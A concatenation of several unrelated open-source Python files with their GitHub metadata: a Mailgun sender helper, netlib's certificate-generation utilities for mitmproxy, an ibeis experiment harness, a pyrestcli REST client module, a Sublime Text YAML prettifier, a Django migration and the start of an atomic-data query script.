"https://api.mailgun.net/v2/%s/messages" % DOMAIN,
auth=("api", API_KEY),
data={"from": FROM_FIELD,
"to": to_list,
"subject": subject,
"text": message})
def build_sender(from_email, from_name):
if from_name is None:
return from_email
else:
return "%s <%s>" % (from_name, from_email)
|
{
"content_hash": "2b5ac2bbe8fc6b406e53a4a0d773f47b",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 81,
"avg_line_length": 29.136363636363637,
"alnum_prop": 0.625585023400936,
"repo_name": "asobrien/carlae",
"id": "bea636636fa6acd51d79ec3c73694db6fff45868",
"size": "1307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "carlae/mail.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4104"
},
{
"name": "HTML",
"bytes": "18475"
},
{
"name": "JavaScript",
"bytes": "969"
},
{
"name": "Python",
"bytes": "29229"
}
],
"symlink_target": ""
}
|
import os, ssl, time, datetime
from pyasn1.type import univ, constraint, char, namedtype, tag
from pyasn1.codec.der.decoder import decode
from pyasn1.error import PyAsn1Error
import OpenSSL
import tcp
default_exp = 62208000 # =24 * 60 * 60 * 720
default_o = "mitmproxy"
default_cn = "mitmproxy"
def create_ca(o=default_o, cn=default_cn, exp=default_exp):
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)
ca = OpenSSL.crypto.X509()
ca.set_serial_number(int(time.time()*10000))
ca.set_version(2)
ca.get_subject().CN = cn
ca.get_subject().O = o
ca.gmtime_adj_notBefore(0)
ca.gmtime_adj_notAfter(exp)
ca.set_issuer(ca.get_subject())
ca.set_pubkey(key)
ca.add_extensions([
OpenSSL.crypto.X509Extension("basicConstraints", True,
"CA:TRUE"),
OpenSSL.crypto.X509Extension("nsCertType", True,
"sslCA"),
OpenSSL.crypto.X509Extension("extendedKeyUsage", True,
"serverAuth,clientAuth,emailProtection,timeStamping,msCodeInd,msCodeCom,msCTLSign,msSGC,msEFS,nsSGC"
),
OpenSSL.crypto.X509Extension("keyUsage", False,
"keyCertSign, cRLSign"),
OpenSSL.crypto.X509Extension("subjectKeyIdentifier", False, "hash",
subject=ca),
])
ca.sign(key, "sha1")
return key, ca
def dummy_ca(path, o=default_o, cn=default_cn, exp=default_exp):
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
if path.endswith(".pem"):
basename, _ = os.path.splitext(path)
basename = os.path.basename(basename)
else:
basename = os.path.basename(path)
key, ca = create_ca(o=o, cn=cn, exp=exp)
# Dump the CA plus private key
f = open(path, "wb")
f.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, key))
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Dump the certificate in PEM format
f = open(os.path.join(dirname, basename + "-cert.pem"), "wb")
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Create a .cer file with the same contents for Android
f = open(os.path.join(dirname, basename + "-cert.cer"), "wb")
f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, ca))
f.close()
# Dump the certificate in PKCS12 format for Windows devices
f = open(os.path.join(dirname, basename + "-cert.p12"), "wb")
p12 = OpenSSL.crypto.PKCS12()
p12.set_certificate(ca)
p12.set_privatekey(key)
f.write(p12.export())
f.close()
return True
def dummy_cert(ca, commonname, sans):
"""
Generates and writes a certificate to fp.
ca: Path to the certificate authority file, or None.
commonname: Common name for the generated certificate.
sans: A list of Subject Alternate Names.
Returns cert path if operation succeeded, None if not.
"""
ss = []
for i in sans:
ss.append("DNS: %s"%i)
ss = ", ".join(ss)
raw = file(ca, "rb").read()
ca = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, raw)
key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, raw)
cert = OpenSSL.crypto.X509()
cert.gmtime_adj_notBefore(-3600*48)
cert.gmtime_adj_notAfter(60 * 60 * 24 * 30)
cert.set_issuer(ca.get_subject())
cert.get_subject().CN = commonname
cert.set_serial_number(int(time.time()*10000))
if ss:
cert.set_version(2)
cert.add_extensions([OpenSSL.crypto.X509Extension("subjectAltName", True, ss)])
cert.set_pubkey(ca.get_pubkey())
cert.sign(key, "sha1")
return SSLCert(cert)
class CertStore:
"""
Implements an in-memory certificate store.
"""
def __init__(self):
self.certs = {}
def get_cert(self, commonname, sans, cacert):
"""
Returns an SSLCert object.
commonname: Common name for the generated certificate. Must be a
valid, plain-ASCII, IDNA-encoded domain name.
sans: A list of Subject Alternate Names.
cacert: The path to a CA certificate.
Return None if the certificate could not be found or generated.
"""
if commonname in self.certs:
return self.certs[commonname]
c = dummy_cert(cacert, commonname, sans)
self.certs[commonname] = c
return c
class _GeneralName(univ.Choice):
# We are only interested in dNSNames. We use a default handler to ignore
# other types.
componentType = namedtype.NamedTypes(
namedtype.NamedType('dNSName', char.IA5String().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)
)
),
)
class _GeneralNames(univ.SequenceOf):
componentType = _GeneralName()
sizeSpec = univ.SequenceOf.sizeSpec + constraint.ValueSizeConstraint(1, 1024)
class SSLCert:
def __init__(self, cert):
"""
Returns a (common name, [subject alternative names]) tuple.
"""
self.x509 = cert
@classmethod
def from_pem(klass, txt):
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, txt)
return klass(x509)
@classmethod
def from_der(klass, der):
pem = ssl.DER_cert_to_PEM_cert(der)
return klass.from_pem(pem)
def to_pem(self):
return OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, self.x509)
def digest(self, name):
return self.x509.digest(name)
@property
def issuer(self):
return self.x509.get_issuer().get_components()
@property
def notbefore(self):
t = self.x509.get_notBefore()
return datetime.datetime.strptime(t, "%Y%m%d%H%M%SZ")
@property
def notafter(self):
t = self.x509.get_notAfter()
return datetime.datetime.strptime(t, "%Y%m%d%H%M%SZ")
@property
def has_expired(self):
return self.x509.has_expired()
@property
def subject(self):
return self.x509.get_subject().get_components()
@property
def serial(self):
return self.x509.get_serial_number()
@property
def keyinfo(self):
pk = self.x509.get_pubkey()
types = {
OpenSSL.crypto.TYPE_RSA: "RSA",
OpenSSL.crypto.TYPE_DSA: "DSA",
}
return (
types.get(pk.type(), "UNKNOWN"),
pk.bits()
)
@property
def cn(self):
c = None
for i in self.subject:
if i[0] == "CN":
c = i[1]
return c
@property
def altnames(self):
altnames = []
for i in range(self.x509.get_extension_count()):
ext = self.x509.get_extension(i)
if ext.get_short_name() == "subjectAltName":
try:
dec = decode(ext.get_data(), asn1Spec=_GeneralNames())
except PyAsn1Error:
continue
for i in dec[0]:
altnames.append(i[0].asOctets())
return altnames
def get_remote_cert(host, port, sni):
c = tcp.TCPClient(host, port)
c.connect()
c.convert_to_ssl(sni=sni)
return c.cert
|
{
"content_hash": "14c76f30ee1be3bbcdd06ba3a25fb1d9",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 136,
"avg_line_length": 30.633744855967077,
"alnum_prop": 0.602498656636217,
"repo_name": "fkolacek/FIT-VUT",
"id": "0349bec7a5c5c6c7437ba761b1ad3f5699d6bedb",
"size": "7444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/site-packages/netlib/certutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
}
|
"""
Runs many queries and keeps track of some results
"""
from __future__ import absolute_import, division, print_function
import sys
import textwrap
import numpy as np # NOQA
import utool as ut
from ibeis.expt import experiment_helpers
from ibeis.expt import test_result
print, rrr, profile = ut.inject2(__name__)
NOMEMORY = ut.get_argflag('--nomemory')
TESTRES_VERBOSITY = 2 - (2 * ut.QUIET)
NOCACHE_TESTRES = ut.get_argflag(('--nocache-testres', '--nocache-big'),
False)
USE_BIG_TEST_CACHE = (not ut.get_argflag(('--no-use-testcache',
'--nocache-test')) and
ut.USE_CACHE and
not NOCACHE_TESTRES)
USE_BIG_TEST_CACHE = False
TEST_INFO = True
# dont actually query. Just print labels and stuff
DRY_RUN = ut.get_argflag(('--dryrun', '--dry'))
def run_expt(ibs, acfg_name_list, test_cfg_name_list, use_cache=None,
qaid_override=None, daid_override=None, initial_aids=None):
r"""
Loops over annot configs.
Try and use this function as a starting point to clean up this module.
The code is getting too untenable.
CommandLine:
python -m ibeis.expt.harness run_expt --acfginfo
python -m ibeis.expt.harness run_expt --pcfginfo
python -m ibeis.expt.harness run_expt
Ignore:
test_cfg_name_list = [p]
Example:
>>> # SLOW_DOCTEST
>>> from ibeis.expt.harness import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb(defaultdb='PZ_MTEST')
>>> default_acfgstrs = ['ctrl:qsize=20,dpername=1,dsize=10',
>>> 'ctrl:qsize=20,dpername=10,dsize=20']
>>> acfg_name_list = default_acfgstrs
>>> test_cfg_name_list = ['default:proot=smk', 'default']
>>> #test_cfg_name_list = ['custom', 'custom:fg_on=False']
>>> use_cache = False
>>> testres_list = run_expt(ibs, acfg_name_list, test_cfg_name_list, use_cache)
"""
print('[harn] run_expt')
# Generate list of database annotation configurations
if len(acfg_name_list) == 0:
raise ValueError('must give acfg name list')
acfg_list, expanded_aids_list = experiment_helpers.get_annotcfg_list(
ibs, acfg_name_list, qaid_override=qaid_override,
daid_override=daid_override, initial_aids=initial_aids,
use_cache=use_cache)
# Generate list of query pipeline param configs
cfgdict_list, pipecfg_list = experiment_helpers.get_pipecfg_list(
test_cfg_name_list, ibs=ibs)
cfgx2_lbl = experiment_helpers.get_varied_pipecfg_lbls(cfgdict_list)
# NOTE: Can specify --pcfginfo or --acfginfo
if ut.NOT_QUIET:
ut.colorprint(textwrap.dedent("""
[harn]================
[harn] harness.test_configurations2()""").strip(), 'white')
msg = '[harn] Running %s using %s and %s' % (
ut.quantstr('test', len(acfg_list) * len(cfgdict_list)),
ut.quantstr('pipeline config', len(cfgdict_list)),
ut.quantstr('annot config', len(acfg_list)),
)
ut.colorprint(msg, 'white')
testres_list = []
nAcfg = len(acfg_list)
testnameid = (ibs.get_dbname() + ' ' + str(test_cfg_name_list) +
str(acfg_name_list))
lbl = '[harn] TEST_CFG ' + str(test_cfg_name_list) + str(acfg_name_list)
expanded_aids_iter = ut.ProgIter(expanded_aids_list, lbl='annot config',
freq=1, autoadjust=False,
enabled=ut.NOT_QUIET)
for acfgx, (qaids, daids) in enumerate(expanded_aids_iter):
assert len(qaids) != 0, ('[harness] No query annots specified')
assert len(daids) != 0, ('[harness] No database annotas specified')
acfg = acfg_list[acfgx]
if ut.NOT_QUIET:
ut.colorprint('\n---Annot config testnameid=%r' % (
testnameid,), 'turquoise')
subindexer_partial = ut.ProgPartial(parent_index=acfgx,
parent_length=nAcfg,
enabled=ut.NOT_QUIET)
testres_ = make_single_testres(ibs, qaids, daids, pipecfg_list,
cfgx2_lbl, cfgdict_list, lbl,
testnameid, use_cache=use_cache,
subindexer_partial=subindexer_partial)
if DRY_RUN:
continue
testres_.acfg = acfg
testres_.test_cfg_name_list = test_cfg_name_list
testres_list.append(testres_)
if DRY_RUN:
print('DRYRUN: Cannot continue past run_expt')
sys.exit(0)
testres = test_result.combine_testres_list(ibs, testres_list)
# testres.print_results()
print('Returning Test Result')
return testres
@profile
def make_single_testres(ibs, qaids, daids, pipecfg_list, cfgx2_lbl,
cfgdict_list, lbl, testnameid, use_cache=None,
subindexer_partial=ut.ProgIter):
"""
CommandLine:
python -m ibeis run_expt
"""
cfgslice = None
if cfgslice is not None:
pipecfg_list = pipecfg_list[cfgslice]
dbname = ibs.get_dbname()
# if ut.NOT_QUIET:
# print('[harn] Make single testres')
cfgx2_qreq_ = [
ibs.new_query_request(qaids, daids, verbose=False, query_cfg=pipe_cfg)
for pipe_cfg in ut.ProgIter(pipecfg_list, lbl='Building qreq_',
enabled=False)
]
if use_cache is None:
use_cache = USE_BIG_TEST_CACHE
if use_cache:
try:
bt_cachedir = ut.ensuredir((ibs.get_cachedir(), 'BULK_TEST_CACHE2'))
cfgstr_list = [qreq_.get_cfgstr(with_input=True)
for qreq_ in cfgx2_qreq_]
bt_cachestr = ut.hashstr_arr27(cfgstr_list, ibs.get_dbname() + '_cfgs')
bt_cachename = 'BULKTESTCACHE2_v2'
testres = ut.load_cache(bt_cachedir, bt_cachename, bt_cachestr)
testres.cfgdict_list = cfgdict_list
testres.cfgx2_lbl = cfgx2_lbl # hack override
except IOError:
pass
else:
if ut.NOT_QUIET:
ut.colorprint('[harn] single testres cache hit... returning',
'turquoise')
return testres
if ibs.table_cache:
# HACK
prev_feat_cfgstr = None
cfgx2_cmsinfo = []
cfgiter = subindexer_partial(range(len(cfgx2_qreq_)), lbl='pipe config',
freq=1, adjust=False)
# Run each pipeline configuration
for cfgx in cfgiter:
qreq_ = cfgx2_qreq_[cfgx]
cprint = ut.colorprint
cprint('testnameid=%r' % (testnameid,), 'green')
cprint('annot_cfgstr = %s' % (
qreq_.get_cfgstr(with_input=True, with_pipe=False),), 'yellow')
cprint('pipe_cfgstr= %s' % (
qreq_.get_cfgstr(with_data=False),), 'turquoise')
cprint('pipe_hashstr = %s' % (qreq_.get_pipe_hashid(),), 'teal')
if DRY_RUN:
continue
indent_prefix = '[%s cfg %d/%d]' % (
dbname,
# cfgiter.count (doesnt work when quiet)
(cfgiter.parent_index * cfgiter.length) + cfgx ,
cfgiter.length * cfgiter.parent_length
)
with ut.Indenter(indent_prefix):
# Run the test / read cache
_need_compute = True
if use_cache:
# smaller cache for individual configuration runs
st_cfgstr = qreq_.get_cfgstr(with_input=True)
st_cachedir = ut.unixjoin(bt_cachedir, 'small_tests')
st_cachename = 'smalltest'
ut.ensuredir(st_cachedir)
try:
cmsinfo = ut.load_cache(st_cachedir, st_cachename,
st_cfgstr)
except IOError:
_need_compute = True
else:
_need_compute = False
if _need_compute:
assert not ibs.table_cache
if ibs.table_cache:
if (len(prev_feat_cfgstr is not None and
prev_feat_cfgstr != qreq_.qparams.feat_cfgstr)):
# Clear features to preserve memory
ibs.clear_table_cache()
#qreq_.ibs.print_cachestats_str()
cm_list = qreq_.execute()
cmsinfo = test_result.build_cmsinfo(cm_list, qreq_)
# record previous feature configuration
if ibs.table_cache:
prev_feat_cfgstr = qreq_.qparams.feat_cfgstr
if use_cache:
ut.save_cache(st_cachedir, st_cachename, st_cfgstr,
cmsinfo)
if not NOMEMORY:
# Store the results
cfgx2_cmsinfo.append(cmsinfo)
else:
cfgx2_qreq_[cfgx] = None
if ut.NOT_QUIET:
ut.colorprint('[harn] Completed running test configurations', 'white')
if DRY_RUN:
print('ran tests dryrun mode.')
return
if NOMEMORY:
print('ran tests in memory savings mode. Cannot Print. exiting')
return
# Store all pipeline config results in a test result object
testres = test_result.TestResult(pipecfg_list, cfgx2_lbl, cfgx2_cmsinfo,
cfgx2_qreq_)
testres.testnameid = testnameid
testres.lbl = lbl
testres.cfgdict_list = cfgdict_list
testres.aidcfg = None
if use_cache:
try:
ut.save_cache(bt_cachedir, bt_cachename, bt_cachestr, testres)
except Exception as ex:
ut.printex(ex, 'error saving testres cache', iswarning=True)
if ut.SUPER_STRICT:
raise
return testres
if __name__ == '__main__':
"""
CommandLine:
python -m ibeis.expt.harness
python -m ibeis.expt.harness --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
{
"content_hash": "cb517c56f14c669247b3d703cd2f411e",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 87,
"avg_line_length": 38.07835820895522,
"alnum_prop": 0.5550220480156786,
"repo_name": "Erotemic/ibeis",
"id": "348ee13a3c96a541a8f647089472e37fd2dfff2d",
"size": "10229",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "ibeis/expt/harness.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "4676"
},
{
"name": "Dockerfile",
"bytes": "13018"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "Python",
"bytes": "6661573"
},
{
"name": "Shell",
"bytes": "56171"
}
],
"symlink_target": ""
}
|
import requests
from six import with_metaclass, iteritems
from future.utils import python_2_unicode_compatible
from datetime import datetime
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from .fields import Field
from .paginators import DummyPaginator
from .exceptions import NotFoundException
class APIConnected(object):
"""
This class handle API endpoints and interfaces with the authorization client for actually sending requests
"""
class Meta:
"""
This class hosts all the configuration parameters of the main class
:param collection_endpoint: Relative path to the collection, /-terminated
:param parse_json: Must be True is response data comes as a json string on the body of the response, False otherwise
"""
collection_endpoint = None
parse_json = True
def __init__(self, auth_client):
"""
Initializes the instance
:param auth_client: Client to make (non)authorized requests
:return:
"""
self.client = auth_client
@classmethod
def get_resource_endpoint(cls, resource_id):
"""
Get the relative path to a specific API resource
:param cls: Resource class
:param resource_id: Resource id
:return: Relative path to the resource
"""
return urljoin(cls.get_collection_endpoint(), str(resource_id) + "/") if resource_id is not None else None
@classmethod
def get_collection_endpoint(cls):
"""
Get the relative path to the API resource collection
If self.collection_endpoint is not set, it will default to the lowercase name of the resource class plus an "s" and the terminating "/"
:param cls: Resource class
:return: Relative path to the resource collection
"""
if cls.Meta.collection_endpoint is not None:
if cls.Meta.collection_endpoint.endswith("/"):
return cls.Meta.collection_endpoint
else:
return cls.Meta.collection_endpoint + "/"
else:
return cls.__name__.lower() + "s/"
def send(self, url, http_method, **client_args):
"""
Make the actual request to the API
:param url: URL
:param http_method: The method used to make the request to the API
:param client_args: Arguments to be sent to the auth client
:return: requests' response object
"""
return self.client.send(url, http_method, **client_args)
class ResourceMetaclass(type):
"""
Handle all the work that needs to be done on class initialization to deal with fields
"""
def __init__(cls, name, bases, nmspc):
"""
Manage Meta inheritance and create the self.fields list of field attributes
:param cls: Class object
:param name: Class name
:param bases: Class inheritance
:param nmspc: Class namespace
:return:
"""
super(ResourceMetaclass, cls).__init__(name, bases, nmspc)
for klass in bases:
if hasattr(klass, "Meta"):
for attribute_name, attribute in iteritems(klass.Meta.__dict__):
if not (attribute_name.startswith("__") or hasattr(cls.Meta, attribute_name)):
setattr(cls.Meta, attribute_name, attribute)
cls.fields = []
for attribute_name, attribute in iteritems(cls.__dict__):
if isinstance(attribute, Field):
attribute.name = attribute_name
cls.fields.append(attribute_name)
@python_2_unicode_compatible
class Resource(with_metaclass(ResourceMetaclass, APIConnected)):
"""
Resource on the REST API
API attributes are expected to be defined as attributes on the class by using fields. Configuration parameters go in the Meta class
"""
class Meta:
"""
This class hosts all the configuration parameters of the main class
:param id_field: Name of the field that acts as the unique API identifier for the resouce
:param name_field: Name of the field whose value can be used as a friendly representation of the resource
:param json_data: Whether the API expects data to be sent as json or not
"""
id_field = "id"
name_field = "id"
json_data = True
def __init__(self, auth_client, **kwargs):
"""
Initializes the resource
:param auth_client: Client to make (non)authorized requests
:param kwargs: Initial value for attributes
:return:
"""
for name, value in iteritems(kwargs):
setattr(self, name, value)
super(Resource, self).__init__(auth_client)
def __str__(self):
"""
Give a nice representation for the resource
:param return: Resource friendly representation based on the self.Meta.name_field attribute
"""
return getattr(self, self.Meta.name_field, super(Resource, self).__str__())
def get_id(self):
return getattr(self, self.Meta.id_field, None)
def get_resource_endpoint(self):
"""
Get the relative path to the specific API resource
:return: Relative path to the resource
"""
return super(Resource, self).get_resource_endpoint(self.get_id())
def update_from_dict(self, attribute_dict):
"""
Update the fields of the resource out of a data dictionary taken out of an API response
:param attribute_dict: Dictionary to be mapped into object attributes
:return:
"""
for field_name, field_value in iteritems(attribute_dict):
if self.fields is None or field_name in self.fields:
setattr(self, field_name, field_value)
def send(self, url, http_method, **client_args):
"""
Make the actual request to the API, updating the resource if necessary
:param url: Endpoint URL
:param http_method: The method used to make the request to the API
:param client_args: Arguments to be sent to the auth client
:return:
"""
response = super(Resource, self).send(url, http_method, **client_args)
response_data = self.client.get_response_data(response, self.Meta.parse_json)
# Update Python object if we get back a full object from the API
try:
if response_data:
self.update_from_dict(response_data)
except ValueError:
pass
return response if response is not None else None
def save(self, force_create=False, fields=None):
"""
Saves (creates or updates) resource on the server
:param force_create: If True, forces resource creation even if it already has an Id.
:param fields: List of fields to be saved. If None, all fields will be saved.
:return:
"""
values = {}
fields = fields or self.fields
for field_name in fields:
value = getattr(self, field_name)
# When creating or updating, only references to other resources are sent, instead of the whole resource
if isinstance(value, Resource):
if value._expand is False:
value = value.get_id()
else:
value = {"id": value.get_id()}
if isinstance(value, list):
# Lists of resources are not sent when creating or updating a resource
if len(value) > 0 and isinstance(value[0], Resource):
value = None
else:
# We need to check for datetimes in the list
final_value_list = []
for item in value:
final_value_list.append(item.isoformat() if isinstance(item, datetime) else item)
value = final_value_list
if isinstance(value, datetime):
# TODO: Allow for different formats
value = value.isoformat()
if value is not None:
values[field_name] = value
http_headers = {'content-type': 'application/json'} if self.Meta.json_data is True else None
json = values if self.Meta.json_data is True else None
data = values if self.Meta.json_data is False else None
if self.get_resource_endpoint() is not None and force_create is False:
return self.send(self.get_resource_endpoint(), "put", headers=http_headers, json=json, data=data)
else:
return self.send(self.get_collection_endpoint(), "post", headers=http_headers, json=json, data=data)
def refresh(self):
"""
Refreshes a resource by checking against the API
:return:
"""
if self.get_resource_endpoint() is not None:
return self.send(self.get_resource_endpoint(), "get")
def delete(self):
"""
Deletes the resource from the server; Python object remains untouched
:return:
"""
if self.get_resource_endpoint() is not None:
return self.send(self.get_resource_endpoint(), http_method="delete")
class Manager(APIConnected):
"""
Manager class for resources
:param resource_class: Resource class
:param json_collection_attribute: Which attribute of the response json hosts the list of resources when retrieving the resource collection
:param paginator_class: Which paginator class to use when retrieving the resource collection
"""
resource_class = None
json_collection_attribute = "data"
paginator_class = DummyPaginator
def __init__(self, auth_client):
"""
:param auth_client: Client to make (non)authorized requests
:return:
"""
self.paginator = self.paginator_class(auth_client.base_url)
super(Manager, self).__init__(auth_client)
@classmethod
def get_collection_endpoint(cls):
"""
Get the relative path to the API resource collection, using the corresponding resource class
:param cls: Manager class
:return: Relative path to the resource collection
"""
return cls.resource_class.get_collection_endpoint()
def get(self, resource_id):
"""
Get one single resource from the API
:param resource_id: Id of the resource to be retrieved
:return: Retrieved resource
"""
response = self.send(self.get_resource_endpoint(resource_id), "get")
try:
resource = self.resource_class(self.client)
except (ValueError, TypeError):
return None
else:
response_data = self.client.get_response_data(response, self.Meta.parse_json)
if response_data:
resource.update_from_dict(response_data)
return resource
def get_or_none(self, resource_id):
"""
Get one single resource from the API, return None if not found, except of raising an exception
:param resource_id: Id of the resource to be retrieved
:return: Retrieved resource
"""
try:
return self.get(resource_id)
except NotFoundException:
return None
def filter(self, **search_args):
"""
Get a filtered list of resources
:param search_args: To be translated into ?arg1=value1&arg2=value2...
:return: A list of resources
"""
search_args = search_args or {}
raw_resources = []
for url, paginator_params in self.paginator.get_urls(self.get_collection_endpoint()):
search_args.update(paginator_params)
response = self.paginator.process_response(self.send(url, "get", params=search_args))
raw_resources += self.client.get_response_data(response, self.Meta.parse_json)[self.json_collection_attribute] if self.json_collection_attribute is not None else self.client.get_response_data(response, self.Meta.parse_json)
resources = []
for raw_resource in raw_resources:
try:
resource = self.resource_class(self.client)
except (ValueError, TypeError):
continue
else:
resource.update_from_dict(raw_resource)
resources.append(resource)
return resources
def all(self):
"""
Get a list of all the resources
:return: A list of resources
"""
return self.filter()
def create(self, **kwargs):
"""
Create a resource on the server
:params kwargs: Attributes (field names and values) of the new resource
"""
resource = self.resource_class(self.client)
resource.update_from_dict(kwargs)
resource.save(force_create=True)
return resource
|
{
"content_hash": "4ed7770b4230cf8075e0671b1e2167f2",
"timestamp": "",
"source": "github",
"line_count": 344,
"max_line_length": 235,
"avg_line_length": 37.50581395348837,
"alnum_prop": 0.6164935668888545,
"repo_name": "danicarrion/pyrestcli",
"id": "40f43d332b6262d85a95912894639167404819a3",
"size": "12902",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyrestcli/resources.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38706"
}
],
"symlink_target": ""
}
|
import sublime
import sublime_plugin
import decimal
try:
from . import yaml
except (ImportError, ValueError):
import yaml
s = sublime.load_settings("Pretty YAML.sublime-settings")
class PrettyyamlCommand(sublime_plugin.TextCommand):
def run(self, edit):
""" Pretty print YAML """
regions = self.view.sel()
for region in regions:
selected_entire_file = False
if region.empty() and len(regions) > 1:
continue
elif region.empty() and s.get("use_entire_file_if_no_selection", True):
selection = sublime.Region(0, self.view.size())
selected_entire_file = True
else:
selection = region
try:
obj = yaml.load(self.view.substr(selection))
self.view.replace(edit, selection, yaml.dump(obj, **s.get("dumper_args")))
if selected_entire_file:
self.change_syntax()
except Exception:
import sys
exc = sys.exc_info()[1]
sublime.status_message(str(exc))
def change_syntax(self):
if "Plain text" in self.view.settings().get('syntax'):
self.view.set_syntax_file("Packages/YAML/YAML.tmLanguage")
def plugin_loaded():
global s
s = sublime.load_settings("Pretty YAML.sublime-settings")
|
{
"content_hash": "2b3e0b500b9dc21fbb0e2c6d02b16409",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 90,
"avg_line_length": 30.47826086956522,
"alnum_prop": 0.572039942938659,
"repo_name": "aukaost/SublimePrettyYAML",
"id": "56a0c9a385cbd61ff49b28cd6e802010cf47ca93",
"size": "1402",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PrettyYaml.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "426340"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finaid', '0012_updates_to_finaidreviewdata'),
]
operations = [
migrations.AddField(
model_name='financialaidapplication',
name='application_type',
field=models.CharField(default=b'general', help_text='Application Classification', max_length=64, verbose_name='Application Type', choices=[(b'general', 'General Applicant'), (b'staff', 'PyCon Staff/Volunteer'), (b'speaker', 'Speaker'), (b'core_dev', 'Python Core Developer'), (b'psf_board', 'PSF Board Member'), (b'outstanding_community_member', 'Outstanding Community Member')]),
),
]
|
{
"content_hash": "7d1b3a869cb32bfd24740086216c9e22",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 393,
"avg_line_length": 41.888888888888886,
"alnum_prop": 0.6671087533156499,
"repo_name": "PyCon/pycon",
"id": "8414c6c0df7f68960775a396767aab8f5f0d999d",
"size": "778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycon/finaid/migrations/0013_financialaidapplication_application_type.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "80909"
},
{
"name": "Dockerfile",
"bytes": "163"
},
{
"name": "HTML",
"bytes": "313093"
},
{
"name": "JavaScript",
"bytes": "161207"
},
{
"name": "Makefile",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "993540"
},
{
"name": "Shell",
"bytes": "14094"
},
{
"name": "Smarty",
"bytes": "7379"
}
],
"symlink_target": ""
}
|
"""
Query database to create an atom
"""
import unicodedata
import numpy as np
from operator import itemgetter
from mypython.database.element import Element
from mypython.database.table.shared_tool import cursor
from mypython.database.table.shared_tool import safe_fetchone
def merge(list_input,order):
list_tmp=[]
for i in range(len(list_input)):
for j in range(len(order)):
if(list_input[i][5]==order[j]):
list_input[i][5]=j
list_tmp.append(list_input[i])
break
list_tmp.sort(key = lambda row: (row[1],row[2],row[3],row[4],row[5]))
list_output=[]
key=[]
for i in range(len(list_tmp)):
key2 = [list_tmp[i][1],list_tmp[i][2],list_tmp[i][3],list_tmp[i][4]]
if(key != key2):
key = key2
list_output.append(list_tmp[i])
return list_output
def atom(name,isotope=-1,charge=0,method=["nist","divers","cipsi"],method_dip=None,spinorbit=False):
if(isinstance(method,str)): method=[method]
for val in method:
val=unicodedata.normalize("NFKD", val.casefold())
if(method_dip==None):method_dip=method
else:
if(isinstance(method_dip,str)): method_dip=[method_dip]
for val in method_dip:
val=unicodedata.normalize("NFKD", val.casefold())
cursor.execute("""SELECT number,fullname,electrons_valence
FROM general WHERE label = ?""",(name,))
